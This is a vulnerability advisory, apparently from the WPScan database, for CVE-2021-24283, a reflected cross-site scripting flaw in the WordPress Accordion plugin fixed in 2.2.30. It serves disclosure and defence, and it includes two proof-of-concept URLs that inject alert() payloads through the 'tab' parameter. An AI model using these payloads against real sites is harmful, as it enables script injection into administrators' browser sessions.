logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Accordion < 2.2.30 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The tab GET parameter of the settings page is not sanitised or escaped when being output back in an HTML attribute, leading to a reflected XSS issue.

Proof of Concept

v < 2.2.29
https://example.com/wp-admin/edit.php?post_type=accordions&page=settings&tab=a%22%3E%3Csvg%2Fonload%3Dalert%28123%29%3B%2F%2F%3E%3C%22

v < 2.2.30
https://example.com/wp-admin/edit.php?post_type=accordions&page=settings&tab=a"+onfocus%3Dalert(%2FXSS%2F)+autofocus%3Dautofocus+b%3D

Affects Plugins

accordions

Fixed in version 2.2.30

References

CVE

CVE-2021-24283

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

iohex

Submitter

iohex

Submitter twitter

iohehe

Verified

Yes

WPVDB ID

6ccd9990-e15f-4800-b499-f7c74b480051

Timeline

Publicly Published

2021-04-21 (about 3 months ago)

Added

2021-04-21 (about 3 months ago)

Last Updated

2021-04-21 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin